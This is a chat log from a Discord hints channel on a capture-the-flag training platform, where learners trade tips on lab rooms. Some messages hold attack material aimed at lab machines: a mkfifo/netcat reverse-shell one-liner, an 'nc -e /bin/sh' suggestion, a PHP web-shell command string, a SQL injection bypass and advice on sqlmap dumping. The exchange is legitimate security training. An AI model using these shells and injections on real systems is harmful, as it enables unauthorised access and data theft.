anyway thank you for the help. are u using windbg there ?

patent token
#

The image is the crash details from running the oscp.exe file with wine.

#

Actually does a good job of feeding back the crash registers.

white salmon
#

great! so wine can be a good idea to debug winbinarries

#

thank u all!

patent token
#

If you know how to use it. I would stick to Immunity Debugger for now.

white salmon
#

i guess i just need to keep trying harder 🙂

#

thx

marsh ravine
#

Hi everyone, i'm stuck in the hatter user on wonderland room. I guess i need to switch to the tryhackme user, but i have no clue how to keep going. The only thing i had in mind is that the webserver is running by the tryhackme user. Can someone pls give me a hint? Maybe some reading materials?

heady anchor
#

Hi everyone, i'm stuck in the hatter user on wonderland room. I guess i need to switch to the tryhackme user, but i have no clue how to keep going. The only thing i had in mind is that the webserver is running by the tryhackme user. Can someone pls give me a hint? Maybe some reading materials?
@marsh ravine may I ask for an image pls 🙃

trim haven
#

@heady anchor sorted dw

oblique cliff
#

@white salmon if you overflow it too much it may cause an error which changes the return address to the location of the error. So you should go too far over

trim haven
#

Oh shoot

#

I read the wrong message kekw

heady anchor
trim haven
#

Proceed with your helping my bad 😂😂

oblique cliff
#

Can you remove that weasel

#

It says the answer of what to do

heady anchor
#

Sure

oblique cliff
#

Thanks 🙂

#

Wouldn’t have been a problem it just said which user and everything

heady anchor
#

I speak too much about it sorry😅

oblique cliff
#

No worries the help is appreciated 🙂

marsh ravine
#

@marsh ravine may I ask for an image pls 🙃
@heady anchor
Sure, but of what?

#

The prosses running?

ashen matrix
#

@marsh ravine You currently have access to the hatter account? What have you checked within hatter?

heady anchor
#

@marsh ravine u getting hatter user now?

marsh ravine
#

@marsh ravine You currently have access to the hatter account? What have you checked within hatter?
@ashen matrix
I have ran linpeas, nothing special popped out. Checked if i'm in the sudoers list, i'm not. And the only thing i found is the file running as the http server+tryhackme user is the one running it.

#

@marsh ravine u getting hatter user now?
@heady anchor
I'm already hatter

ashen matrix
#

@marsh ravine You need to check more

#

You are missing something specific

tender wedge
#

need hint for internal, im stuck ..

heady anchor
#

Lemme give u some hint cmdick

#

U will need related capabilities for Perl

#

That's the biggest hint

trim haven
#

@patent token Someone wants a hint on your room :)) (sorry for pinging I don't want it to get lost in chat)

marsh ravine
#

Ok, thanks!

heady anchor
#

And one more

#

@marsh ravine

#

Remember to check some cheatsheets

#

🙃

marsh ravine
#

👍

patent token
#

You can DM me FrostRekt for a hint.

marsh ravine
#

Made it, thank you!
Learned somthing new😁

wooden estuary
#

any clue pls

trim haven
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

mild eagle
#

@patent token can i DM internal room ?

patent token
#

You may.

trim haven
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

trim haven
#

Delete all that please @wooden estuary

#

and @craggy pulsar They're back again...

wooden estuary
#

wats wrong, ive explained my problem to the fullest @trim haven and i'm sticking to this channel only

trim haven
#

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

craggy pulsar
#

@wooden estuary Hey! You should read the #rules section of this Discord. Sorry if we're coming across harsh, it's just we get so many people everyday it's hard for us 😦 We can't provide help for that room until a certain number of days is up, as its so new. We are a learning platform first, but we have to respect the competitive nature of it too 🙂

wooden estuary
#

I get u now @craggy pulsar , I've deleted tat

craggy pulsar
#

I get u now @craggy pulsar , I've deleted tat
@wooden estuary Thanks a lot ❤️ 🙂

slender nexus
#

We can't provide help for that room until a certain number of days is up, as its so new.
I've just read the whole channel again and didn't see any mention of this though. 😕
Is there a set, specific number of days for a room after which you can provide/get help? How many?

trim haven
#

Depends on the room creator but a minimum of 48 hours

slender nexus
#

oh right
I didn't see the whole context, I imagined it would be in the range of 20, 40, 80 days

2 days seems kinda obvious imo

trim haven
#

Aha

empty heath
#

Anybody did "ConvertMyVideo"? was wondering how to go from the website source code to the actual attack. how would you figure out that you need to attack that way

rough helm
#

Hello, can somebody help in the "Linux Challenges" room task 2 question #4 can't find the "cron jobs".

trim haven
#

@rough helm explain?

rough helm
trim haven
#

Have you googled where to find cron jobs

rough helm
#

Yes, but google tell me to go in /etc/ cron.d cron.daily ...

trim haven
rough helm
#

can acces to this file

#

already try

trim haven
#

Well you know cron jobs are sored in a file called crontabs

#

Maybe look for crontabs

rough helm
#

crontab need root acces or be in the crontab group

#

I know where to look now, thanks for the hints!

quartz ruin
#

In hackpart room, i answered windowscheduler.exe at below ques ( Further enumerate the machine.

What is the name of the abnormal service running? )

#

but still wrong

#

wscheduler.exe

stuck fractal
#

That's not the name of the service, that's the name of the executable

quartz ruin
#

what do u means ?

#

Message.exe

#

?

stuck fractal
#

These are all names of executables

#

Not the name of the service

quartz ruin
#

ok

#

I got

#

Thanks @stuck fractal

rough helm
#

what ||setgid bid set|| mean pls?

trim haven
#

Was just about to send that aha

rough helm
#

Um, I see thank you.

empty heath
#

anybody available for a question on ConvertMyVideo?

solemn smelt
#

just ask your question here

trim haven
#

Anybody did "ConvertMyVideo"? was wondering how to go from the website source code to the actual attack. how would you figure out that you need to attack that way
@empty heath @solemn smelt

solemn smelt
#

@empty heath no need to dm blobfingerguns

#

have you looked at a writeup to see how they got to the attack?

empty heath
#

yes, i get it

#

what I don't get is how you get from the info we have, to the decision to do the attack

#

so i needed someone who had done it, as the writeups don't have that (unfortunately)

solemn smelt
#

this writeup does a good job of explaining it

tidal sedge
#

@trim haven The minimum wait time is 3 days, not 2 I believe 👀

timid trail
#

need hints for git happ

still lintel
#

need hint for "Ra2"

#

i've got ||certs|| ||converted pfx into pem files|| not sure what to do next 😄

fervent marsh
#

Hey people, Are there any rooms related to Drupal?

stuck fractal
#

If you go to hacktivities, and search drupal?

fervent marsh
#

There are none. Is anyone planning to create one?

rose root
#

Hi. I need help with harder room. I got a shell but cant do anything with that becouse of "sh: w: not found". Cant' run any commnad

vast prairie
#

Just curious, for mrrobot, are we supposed to try to get into the user on the machine? I feel like I followed a red-herring

white salmon
#

@vast prairie Yes.

still lintel
#

@rose root use a different shell? bash instead of sh? how did you get the shell?

rose root
#

@still lintel just uploaded php file with shell

still lintel
#

dm me the php script

rose root
#

'uname -a; w; id; /bin/sh -i';

still lintel
#

'uname -a; w; id; /bin/bash -i';

#

try that?

stuck fractal
#

remove the w;

still lintel
#

and yes

#

the w:

rose root
#

ok, try with that

vast prairie
#

Thanks, I'll keep trying to gain access then. I think I'm close and just missing a step

rose root
#

@still lintel still the same

#

or even worse, becouse right now automaticaly exits from shell

still lintel
#

Just take w; like @stuck fractal said

rose root
#

its without w;

still lintel
#

How you passing the shell?

rose root
#

just set up the value

still lintel
#

How are you triggering the shell?

rose root
#

from burp

#

I need HEADER to bypass ip filter

still lintel
#

Ahh ok

rose root
#

maybe I'll try with curl

still lintel
#

nc+-e+/bin/sh+your IP+your port

#

Tried a netcat shell?

rose root
#

yup

still lintel
#

Mkfifo

#

Tried that

rose root
#

If you mean this one:

#

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.1.224 8888 >/tmp/f

#

doesnt work too

oblique cliff
#

the one you had before was immediately exiting cuz you were trying to spawn a bash shell on a system that doesnt have bash

rose root
#

At the first time I tried with sh

oblique cliff
#

and what was the error

rose root
#

sh: w: not found

stuck fractal
#

remove w;

rose root
#

I removed

vast prairie
#

I'm stuck on mr robot.

oblique cliff
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
slender nexus
#

I'm doing 25daysofchristmas, day 10 (task 15)
I got inside the webserver using metasploit and got the creds to do the rest of the task, but didn't find the flag1
there is a directory ||/flag-dir|| but it's empty

vast prairie
#

I'm in the machine as ||daemon|| and I have the username and password for ||robot|| I'm just a bit confused as how to login as ||robot||

#

Not sure if that needs spoilers or not

oblique cliff
#

it can stay with spoilers

#

have you tried anything for getting to robot?

vast prairie
#

Tried su, but it says that it needs to be in a terminal

oblique cliff
#

research into getting a tty shell

#

then you should be golden 🙂

vast prairie
#

ooo thank you!!

oblique cliff
#

not a problem

vast prairie
#

You were right, once I looked that up, the rest of the challenge was easier to do.

slender nexus
#

guess I found my flag

mental vessel
#

Anybody has a hint for internal?

patent token
#

Sure. You can DM me.

lavish stirrup
#

Hello, I am stuck on the set cookie problem in the web room. I submit this and it looks like it should work but I'm getting the error that my cookie isn't named correctly

stuck fractal
#

In Web Fundamentals?

#

flagpls

lavish stirrup
#

rofl

#

thank you /shame

stuck fractal
#

👍

alpine lantern
#

anyone is up ?

stuck fractal
#

Please just ask your question 🙂

alpine lantern
stuck fractal
#

Have you checked the hint on the question?

alpine lantern
#

ye

stuck fractal
#

It's in the task text if you re-read that

#

It's asking about TCP so jump to that part

alpine lantern
#

got it thx 🙂 i'm just blind ^^

white salmon
#

🙄

mild eagle
#

Room internal hints on how to ||break out of the Docker container||

trim haven
#

Warmup only mayor gives out hints on internal.

heady anchor
#

@patent token sorry for the ping someone needs hint for ur new room 🙃

white salmon
#

@white salmon please avoid from giving hints on newly released rooms :)
@trim haven im sorry..if its to much spoiler remove the comment

trim haven
#

No problem :)

flint pebble
#

hey guys, anyone know how to use wfuzz with 3 payloads such that the first 2 are a product and the last payload just iterates?

heady anchor
#

is it a room? @flint pebble

flint pebble
#

its not

heady anchor
#

this is for thm room hint

trim haven
#

Read the channel description

heady anchor
flint pebble
#

ye my bad sorry lads

heady anchor
#

np 🙃

hardy quest
#

Thanks to @patent token for Relevant room. It was a good way to exploit vulns differently and manually 🙏🏻🙏🏻🙏🏻

patent token
#

You're welcome! Glad you enjoyed it.

mossy ermine
#

Any hint for the Wonderland room? About the privilege escalation challenge. Many thanks 😩

final mortar
#

@mossy ermine check pins

mossy ermine
#

@mossy ermine check pins
@final mortar Ok, I'm trying to understand ahaha

inland barn
#

Hello there, iam having some trouble in the room ZTH: Obscure Web Vulns in the task 14. Cant really find the public key. I would appreciate any tip

oblique shuttle
#

hi all, any chance of a nudge on Spring - seen 1 tcp port up.. but so far I have nothing else!..

ebon ferry
#

Are we allowed hints on Spring Room yet?

oblique cliff
#

Spoilers.

#

@languid citrus

languid citrus
#

sorry @oblique cliff

stone oyster
#

It's not there.

#

flag2 for the BLue room task 5

#

I've reset multiple times. IS that the key, just keep resetting until it shows?

oblique cliff
#

Yes

stone oyster
#

ok

#

jobs

#

the walkthru says to getsystem for the hash capture. Do we need to do that for the flag2?

final mortar
#

No

stone oyster
#

ty

#

@final mortar May I dm you?

final mortar
#

Yes

white salmon
#

need help room Kenobi! Task4 #4 after doing the nc 10.10.131.16 21 to the server and copying ssh/id_rsa, next step is to mount the var directory. if i try to mount it: mount 10.10.131.16:/var NFS
nothing shows, it just hangs like that

#

any idea why ?

oblique cliff
#

try it as root

white salmon
#

i found it that it made a NFS folder and inside is tmp/id_rsa but if try cp tmp/id_rsa . it gives cp: cannot create regular file './id_rsa': Read-only file system

#

is that because of my machine or is there some trick ?

solemn smelt
#

try something other than cp

#

you could try to cat the file

broken osprey
#

Im on the Learn Linux Task 43, I am assuming I need to add myself to either a group or into the sudoers file but without root powers that doesnt seem possible. Am I heading in the wrong direction?

slender nexus
#

@broken osprey wait I was thinking about another one

this 👇

oblique cliff
#

Im on the Learn Linux Task 43, I am assuming I need to add myself to either a group or into the sudoers file but without root powers that doesnt seem possible. Am I heading in the wrong direction?
@broken osprey look for out of place files owned by different users

broken osprey
#

the only file that isnt like the others is the .sudo_as_admin file but I cant do anything with it

#

im just gonna have to take a break been at it too long

hidden moat
#

Hi, im currently doing Nmap right now, first answer was -h in the nmap but whenever im using -h i the nmap prgram it says command not found. do i need to use it some other way?

astral smelt
#

Can you show a screenshot please

hidden moat
patent token
#

You didn't run nmap with it

hidden moat
#

oh right

patent token
#

Nmap -h

lusty wigeon
#

Are we allowed hints on Spring Room yet?
@ebon ferry yes, feel free to ask

#

hi all, any chance of a nudge on Spring - seen 1 tcp port up.. but so far I have nothing else!..
@oblique shuttle you should find 3 ports, higher 2 takes some time to initialize

still lintel
#

anyone done Ra2 room?

orchid fossil
#

anyone can give me a sanity check on Relevant root?

ebon ferry
#

@lusty wigeon please can I PM

lusty wigeon
#

sure

white salmon
#

@still lintel think it's eluding many of us im afraid

still lintel
#

lol mind if I DM you?

white salmon
#

not sure i canhelp much but

#

come at me bro ?

#

😄

#

@hot skiff or @severe wave are we still hintless for Ra2_v2 ? cos im loosing what little hair i have left, and i think @still lintel is going even crazier 😮 #plzandthnks

still lintel
#

😄

patent token
#

Popo145 what is your question?

oblique cliff
#

Spoiler tagsssssss 😦

patent token
strange bone
#

Hey ppl, any hints on the last question for ZTH: Web 2 ? Got stuck on some process

patent token
#

I have a compiled version of it in one of my repos.

orchid fossil
#

||I uploaded PrinterSpoofer.exe via smb share but executing it gives me nothing at all. I tried executing it via impacket smbserver but to no avail as well. I compiled PrinterSpoofer.exe using VS 2019 and transferred it over to my parrotOS vm.||

#

alright ill check it out thanks!

#

am i doing this spoiler tag thing correctly? sorry im new here

patent token
#

It's fine.

#

You got it.

orchid fossil
#

@patent token It worked. Thanks for the help and the box.

patent token
#

You're welcome. I hope you were able to learn from it. 🙂

dusky osprey
#

I don't know where to go further with the room "uopeasy". I did some enumerating, got some ports, accessed those web pages, did directory scans of all of them, and now I'm kinda stuck on going further

#

"You should have found some additional pages on different ports. What service does the site most likely use for this page?"

#

I said apache, then httpd

lime needle
#

You mean you stuck on this question right

dusky osprey
#

Yeah basically

lime needle
#

It's about the db

#

I too stuck for long

dusky osprey
#

I know there's a phpmyadmin login page

lime needle
#

The DB used

#

I mean the common one

dusky osprey
#

hmm

strange bone
#

Well, i am doing some Fuzzing in some parameters on the last question in ZTH: Web 2 but no success. Any clues for that ?

dusky osprey
#

Ay

#

Oops

lime needle
#

Yup

#

Exactly

dusky osprey
#

Hmm, SQL injection..ugh I forgot how to do this, I remember trying it years ago

lime needle
#

Payloadallthings and sqlmap all the way

dusky osprey
#

"Try and return 1 on the page by entering certain characters into the form."

#

Which page though?

lime needle
#

Just dirbust you will get

#

Form

dusky osprey
#

I use gobuster

lime needle
#

On port 80?

dusky osprey
#

80, 443 and 8080

#

Have all the useful dirs on my browser

lime needle
#

Hmm strange

dusky osprey
#

I also found a login.php using nikto but that wouldnt help now

lime needle
#

That only

#

Buddy

#

Didn't you get a login form

dusky osprey
#

I have a phpmyadmin login, wordpress login, and empty login.php

#

I say empty its just a user and pass box

orchid fossil
lime needle
#

That's all you need

#

Try parameters in form

#

The user and pass one

dusky osprey
#

Ah I get it I think

lime needle
#

I mean sqli type

dusky osprey
#

I put 1 and ' and it returned 0,

lime needle
#

You should try basic auth bypass

dusky osprey
#

Using burpsuite?

lime needle
#

No need just try 1=1 thing

dusky osprey
#

I tried 1=1# and it returned 0 too

lime needle
#

' OR 1 = 1--

#

Hmm strange
Once put it in sqlmap too and see

dusky osprey
#

I'm doing that now

#

Sqlmap spitted out a .csv file w/

#

Target URL,Place,Parameter,Technique(s),Note(s)
http://************/login.php,POST,user,T,

lime needle
#

Did sqlmap show injection then you can -dbs to see the tables

#

And dump it

hot skiff
#

Hi @white salmon Where are you stuck? Just DM.

dusky osprey
#

Did sqlmap show injection then you can -dbs to see the tables
@lime needle I tried doing that but it didn't identify anything

#

Here's what I got so far.

#

A phpmyadmin login page, a wordpress login page, a {ip}/login.php page, and the exact wordpress site on ports 443 and 8080

#

for the {ip}/login.php page, it found a blind sql injection

#

And that's about it so far

grand pivot
#

Hi! how r u? im at haskhell room

candid fiber
#

Please,
What flag numbers all output lines? It has to be cat -nb filename

grand pivot
#

and i upload kind of a shell but i dont know if im using the right path to call it and im gettint a 500 error

#

and having a 500 error is like, im not executing a haskell file?

proven seal
#

@here I'm having some issues executing a python exploit on my machine keep getting errors anyone offer some fresh eyes?

stuck fractal
#

Hey, I answered you in #room-help. I really recommend directly asking your question, then people know if they can help or not. They will help if they can, but they need to know the question first. @proven seal

oblique cliff
#

and having a 500 error is like, im not executing a haskell file?
@grand pivot you shouldn’t need to visit anywhere. The webpage tells you that it’ll compile and execute upon submission

#

@proven seal you also don’t have the ability to @here and the fact that you’d try to notify everyone in this channel just to get your question answered is a bit selfish

grand pivot
#

@oblique cliff right but im getting the 500 error

#

that... is strange. Im just executing a .hs extension file

oblique cliff
#

Is the Haskell code you provided compile-able?

grand pivot
#

mmm lets see, i didnt check

oblique cliff
#

We’re you able to upload anything before?

#

Or is it everything you’ve tried to upload

grand pivot
#

i tried a .php file before

oblique cliff
#

It tells you the valid types of files to upload

#

It tells you exactly what it does

grand pivot
#

but when i'd get an error i just asume that for the text that i should upload haskell file

oblique cliff
#

Good assumption

grand pivot
#

yeah but you know, i wanted to try

oblique cliff
#

Good thought. Ok so have you been able to get any Haskell file to run properly?

grand pivot
#

no, i dont yet

#

first im going to try to compile the file

oblique cliff
#

It does it for you. Why don’t you find some Haskell file online that you know will work if it’s actually doing what it claims?

#

Then once you have confirmation you can create your own?

grand pivot
#

i created my own

#

i get an error, i forgot one letter haha

#

damn

#

i tried just making a ls -l

#

great!! now it works, i did not spell the coMMand correctly

#

thank you

white salmon
#

lol in the XSS Playground room there was a link in the credits to check, Im trying to access it and I get this:

#

tought it was some joke about javascript and turned it off on my browser

#

also tried with curl

#

nevermind I think I know what is happening

storm sphinx
#

anyone can give hint on XSS playground?
I have reached task5 and got stuck, in DOM based XSS q2 alert works with onerror but not with onhover

#

I tried multiple times still same issue while performing payload with onerro it accept and shows me output without flag. but onhover does not work

#

is it bug or I'm missing something ?

white salmon
#

it's not a bug- you probably have the right payload

#

you might be making the javascript call wrong

toxic scarab
#

there's something a bit off on that question with the onhover. read through my writeup on that section

storm sphinx
#

I was totally about to give up 😂

broken osprey
#

I really dont see what I am missing in these file ownerships on Learn Linux Task 43, been going through them all day

storm sphinx
#

thanks @4ngryb34r ad @white salmon

stuck fractal
#

I really dont see what I am missing in these file ownerships on Learn Linux Task 43, been going through them all day
@broken osprey users typically create files in their own homedir

broken osprey
#

the binaries? those are the only thing I see sticking out but dont know what they have to do with anything other than the tasks

stuck fractal
#

Not the binaries

#

There's a file belonging to one of the users that's very much not in their home directory

#

That's suspicious

broken osprey
#

ls -al

#

lol

#

whoops

broken osprey
#

hoho! one small step

#

@stuck fractal thanks for those hints, I have now finally completed the room

stuck fractal
#

Honestly it's a big step up in difficulty

mental ledge
#

hello i want to use winpeas in windows metepreter but it only says process created. I cant see winpeas execute how can i fix this?
[11:08 AM]
it ony shows this meterpreter > execute -f winPEASany.exe
Process 3084 created.

lime needle
#

And that's about it so far
@dusky osprey
Dump the DB and login to wp

sick sun
#

Is it allow to ask springs room ?

heady anchor
#

Is it allow to ask springs room ?
@sick sun yes

main creek
#

Hello, currently in Network Services room and stuck on Enumerating Telnet task #7, how am I to enumerate usernames on this box with Telnet?

final mortar
#

It tells you what command to use

main creek
#

it does?

final mortar
#

Try looking closely at the nmap scan @main creek

main creek
#

this is the result of my nmap scan

#

im either blind or just completely missing something

final mortar
#

It should show up. Anyways you can get this username later too, if you continue on with exploiting telnet

#

Just try to connect to telnet and you will have the answer

main creek
#

hmm ok

#

I mean I can telnet into the box

final mortar
#

and you don't see a potential username ?

main creek
#

I dont see anything

#

one sec

#

thats all i see

final mortar
#

That's officially weird

#

So you also can't answer #7.2 ?

main creek
#

well thats the response i get

#

so no, i can't answer 7.2

final mortar
#

Restart the box

main creek
#

ok, will try.

chrome heron
#

hello @everyone I need some help with 'Frequency Analysis'

#

Crypto Funhouse room, I tried to replace all the letters from the cipher with the english alphabet, did not get anything out, tried to match is as close, but still the same issue

white salmon
#

ahm sorry i dont know about the room, but isn't frequency analysis about counting the most used word and then comparing to the most famous word in the original alphabet?

chrome heron
#

yes exactly that's what frequency analysis about

white salmon
#

ah ok so you did that

#

my bad then idk

chrome heron
#

yes I did that and it did not give me anything

#

I did the permutation between the most frequent letters in the cipher with the most in english alphabet

quiet hound
#

I'm trying to solve Simple CTF room, can someone help me with that

final mortar
#

Sure, ask away

quiet hound
#

I did nmap scan for vulns, can't find anything useful..

#

Trying to bruteforce with hydra.. as the hint says to use best110.txt

final mortar
#

Try dirbusting ?

quiet hound
#

Yeah, dirbuster is currently running

chrome heron
#

@quiet hound scan with the -p-

final mortar
#

Yeah, dirbuster is currently running
@quiet hound Wait for it 🙂

chrome heron
#

nmap will scan for the first 1000, and there might be an interesting service running on a random high port

#

@final mortar have you (by chance) solved the 'cypto fun house' room?

quiet hound
#

@chrome heron I totally forgot about that.. Thanks you so much for the help. I'll try scanning all the ports and futher update

final mortar
#

Let me check real quick

#

@chrome heron I totally forgot about that.. Thanks you so much for the help. I'll try scanning all the ports and futher update
@quiet hound Yeah you will need the -p- flag, just not at this stage

chrome heron
#

@final mortar waiting here

#

@quiet hound sure

final mortar
#

That's a no, sorry

real storm
#

I don't even know where to start in "Git Happens" lol. Is it appropriate to ask for it(s?) hints yet?

final mortar
#

I haven't done that

#

try the .git directory